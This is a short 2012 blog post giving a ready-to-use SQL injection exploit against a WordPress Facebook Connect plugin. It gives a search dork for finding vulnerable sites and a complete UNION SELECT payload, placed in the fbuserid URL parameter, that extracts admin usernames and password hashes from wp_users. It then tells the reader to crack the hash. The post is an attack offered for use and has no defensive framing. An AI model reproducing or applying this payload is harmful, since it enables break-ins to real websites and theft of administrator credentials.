15 thg 6, 2012
WordPress Blog Exploit - SQL Injection
Dork: inurl:"fbconnect_action=myhome"
You will be get such info of admin on page
Just change this part of URL :
?fbconnect_action=myhome&userid=
With This part of URL :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z0mbyak,7,8,9,10,11,12+from+wp_users--
Now You will be get Username and Password of Admin
Than Just Encrypt Password In any MD5 Cracker
![[Tutorial] XSS Bài 2: XSS Nâng cao + Bypass bộ lọc](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixEoUmpwXUmG6BwNUxkp2bx9LwFoIovVmTOD9ZZ_owzNehJ3jW-beXvaWzjpu7tCCpOzOkzIxz-wIwL9Dt8_YxyKl604U03Hd3Z1E3mlDvIB0u0IIf-WtvpXRfkgSv0Y9BzB9EkC6J0uI/s72-c/70.jpg)
Không có nhận xét nào:
Đăng nhận xét